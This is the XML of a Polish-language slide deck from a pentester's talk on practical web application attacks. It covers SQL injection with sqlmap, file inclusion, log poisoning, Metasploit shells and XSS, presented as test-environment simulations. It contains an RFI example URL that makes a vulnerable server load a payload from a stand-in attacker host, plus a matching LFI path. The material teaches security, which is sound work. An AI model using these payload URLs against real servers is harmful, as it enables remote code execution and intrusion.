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8" r:id="rId3"/>
    <p:sldId id="313" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="318" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="280" r:id="rId10"/>
    <p:sldId id="296" r:id="rId11"/>
    <p:sldId id="295" r:id="rId12"/>
    <p:sldId id="324" r:id="rId13"/>
    <p:sldId id="327" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="323" r:id="rId16"/>
    <p:sldId id="329" r:id="rId17"/>
    <p:sldId id="330" r:id="rId18"/>
    <p:sldId id="331" r:id="rId19"/>
    <p:sldId id="332" r:id="rId20"/>
    <p:sldId id="333" r:id="rId21"/>
    <p:sldId id="300" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="325" r:id="rId24"/>
    <p:sldId id="326" r:id="rId25"/>
    <p:sldId id="290" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="264" r:id="rId28"/>
    <p:sldId id="291" r:id="rId29"/>
    <p:sldId id="294" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="320" r:id="rId32"/>
    <p:sldId id="319" r:id="rId33"/>
    <p:sldId id="285" r:id="rId34"/>
    <p:sldId id="307" r:id="rId35"/>
    <p:sldId id="308" r:id="rId36"/>
    <p:sldId id="309" r:id="rId37"/>
    <p:sldId id="304" r:id="rId38"/>
    <p:sldId id="312" r:id="rId39"/>
    <p:sldId id="265" r:id="rId40"/>
    <p:sldId id="311" r:id="rId41"/>
    <p:sldId id="275" r:id="rId42"/>
    <p:sldId id="266" r:id="rId4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50" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-386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8B741-2BF9-4FB6-956D-E24E95201652}" type="datetimeFigureOut">
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>2015-05-18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F7C6B-DD68-4B31-B893-1B17E7AB15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072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7C6B-DD68-4B31-B893-1B17E7AB15D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9839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2015-05-18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2015-05-18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2015-05-18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2015-05-18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2015-05-18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2015-05-18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2015-05-18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238328"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Adam Ziaja &lt;adam@adamziaja.com&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" u="sng" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" u="sng" dirty="0" smtClean="0"/>
              <a:t>adamziaja.com</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3200" u="sng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857164"/>
            <a:ext cx="3048000" cy="3048000"/>
          </a:xfr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 smtClean="0"/>
              <a:t>Praktyczne ataki na aplikacje webowe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338994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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>SQLi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Czy trzeba znać język SQL i techniki manipulacji zapytaniami aby się włamać?</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> – narzędzie do automatycznych ataków SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection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25" y="4149080"/>
            <a:ext cx="1810003" cy="952633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 rot="1028247">
            <a:off x="1609823" y="4464274"/>
            <a:ext cx="39076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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>symulacja w</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>środowisku testowym!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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656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88640"/>
            <a:ext cx="5347048" cy="6113016"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Symbol zastępczy zawartości 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="548680"/>
            <a:ext cx="3240360" cy="5904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 smtClean="0"/>
              <a:t>Krok po kroku</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Jeśli nie wiadomo co kliknąć wystarczy ENTER i wybrana zostanie domyślna wartość</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Efektem końcowym jest uzyskanie dostępu do wiersza poleceń systemu operacyjnego z uprawieniami aplikacji www</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Najczęściej występuje już wtedy możliwość podmiany zawartości strony internetowej</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Ew. dalsza ręczna lub automatyczna eskalacja uprawnień np. przy pomocy modułów </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0"/>
              <a:t>MSF do  ataków </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>lokalnych</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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 rot="2098129">
            <a:off x="839696" y="2105561"/>
            <a:ext cx="746460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HACKED</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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 rot="1601931">
            <a:off x="7188661" y="264265"/>
            <a:ext cx="2007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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>symulacja!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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87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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Framework (MSF)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dirty="0" smtClean="0"/>
              <a:t>Oprogramowanie służące </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>do testów penetracyjnych i łamania zabezpieczeń systemów </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>teleinformatycznych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&lt;adam@adamziaja.com&gt;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57" y="3645024"/>
            <a:ext cx="5714286" cy="139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7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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>)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dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to nie tylko problem aplikacji webowych, ataki można przeprowadzać na wiele sposobów np. przez:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Oprogramowanie OCR (technika rozpoznawania tekstu w plikach graficznych)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Kod kreskowy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>[…]</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1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&lt;adam@adamziaja.com&gt;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872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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> w życiu codziennym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083" y="2360637"/>
            <a:ext cx="5715000" cy="3876675"/>
          </a:xfr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&lt;adam@adamziaja.com&gt;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755576" y="1484784"/>
            <a:ext cx="48572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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sposób na fotoradary?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="4000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(OCR)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="4000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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668587" y="4941168"/>
            <a:ext cx="3888432" cy="64807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8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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> w życiu codziennym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2956190" cy="3230477"/>
          </a:xfr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&lt;adam@adamziaja.com&gt;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368" y="2038821"/>
            <a:ext cx="3779048" cy="338285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 rot="19760299">
            <a:off x="6105346" y="3500061"/>
            <a:ext cx="2074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wersja zakodowana</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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55832" y="1484784"/>
            <a:ext cx="7832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Przykładowe kody kreskowe mogące ujawnić podatność </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: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54807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Remote File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0"/>
              <a:t> (RFI)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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Możliwość </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>zdalnego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> załadowania pliku, którego zawartość zostanie wykonana po stronie podatnego serwera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Dzięki załadowaniu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>payloadu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> MSF uzyskujemy dostęp do wiersza poleceń systemu operacyjnego…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abc.pl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://hacker.com/msf.txt</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0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&lt;adam@adamziaja.com&gt;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 rot="20901807">
            <a:off x="5739175" y="5219710"/>
            <a:ext cx="33084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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (ładunek) – kod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wykonywany przez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – program wykorzystujący</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>błędy w oprogramowaniu</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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7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err="1"/>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0"/>
              <a:t> (LFI)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Możliwość załadowania </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>lokalnego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> pliku, którego zawartość zostanie wykonana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Analogicznie do RFI jeśli jest możliwość załadowania </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>payloadu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> MSF to istnieje możliwość uzyskania dostępu to wiersza poleceń systemu operacyjnego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abc.pl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/msf.txt</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0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&lt;adam@adamziaja.com&gt;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536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Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (LFI)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03959"/>
            <a:ext cx="8229600" cy="2165201"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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5244430"/>
            <a:ext cx="6657975" cy="704850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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="pole tekstowe 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1484784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Przykładowy scenariusz ataku bez MSF, w przypadku jeśli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>serwer www może odczytać własne logi:</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="pole tekstowe 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20894932">
            <a:off x="6600939" y="6115316"/>
            <a:ext cx="2375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…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-agent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4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Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (LFI)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24" y="1412775"/>
            <a:ext cx="6940953" cy="4243810"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Symbol zastępczy zawartości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24" y="5877272"/>
            <a:ext cx="6940953" cy="394933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9" name="Prostokąt 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090908" y="2204864"/>
            <a:ext cx="4201172" cy="324036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 flipV="1">
            <a:off x="4644008" y="1871109"/>
            <a:ext cx="3096344" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0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0B0F0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 flipV="1">
            <a:off x="5652120" y="6165299"/>
            <a:ext cx="1944216" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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46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508" y="2132856"/>
            <a:ext cx="4926985" cy="187936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Adam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>Ziaja, OSCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" u="sng" dirty="0" smtClean="0"/>
              <a:t>http://adamziaja.com</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3600" u="sng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14202"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>w dużej grupie bankowej</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="28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67544" y="3349629"/>
            <a:ext cx="7920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8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pl-PL" sz="28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l-PL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0"/>
              <a:t>penetracyjny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t> jest to kontrolowany atak na system teleinformatyczny przeprowadzany z perspektywy potencjalnego </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>włamywacza</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="pole tekstowe 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20302215">
            <a:off x="6745295" y="5373292"/>
            <a:ext cx="21061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2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>włamuję się…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000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jest to legalne…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000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>płacą mi za to…</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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94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Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (LFI)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24" y="1916270"/>
            <a:ext cx="6940953" cy="2738607"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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490725" y="5086925"/>
            <a:ext cx="4162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…następnie lokalna eskalacja uprawnień</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>np. przez luki w konfiguracji lub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitację</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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 rot="2098129">
            <a:off x="839696" y="2105561"/>
            <a:ext cx="746460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HACKED</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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082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3424" y="260648"/>
            <a:ext cx="8229600" cy="2160240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Bezpieczeństwo aplikacji webowych to nie tylko ataki po stronie serwera, ale również ataki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0" smtClean="0"/>
              <a:t> (po stronie klienta), w których atakowany jest bezpośrednio klient.</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="32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&lt;adam@adamziaja.com&gt;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696" y="2495510"/>
            <a:ext cx="2861056" cy="381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0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Cross-Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(XSS)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Atak polegający na osadzeniu w treści atakowanej strony kodu wykonywanego po stronie klienta (zazwyczaj) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" err="1"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0"/>
              <a:t>(np. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>umieszczony w komentarzu)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>Dwie główne metody ataków XSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1"/>
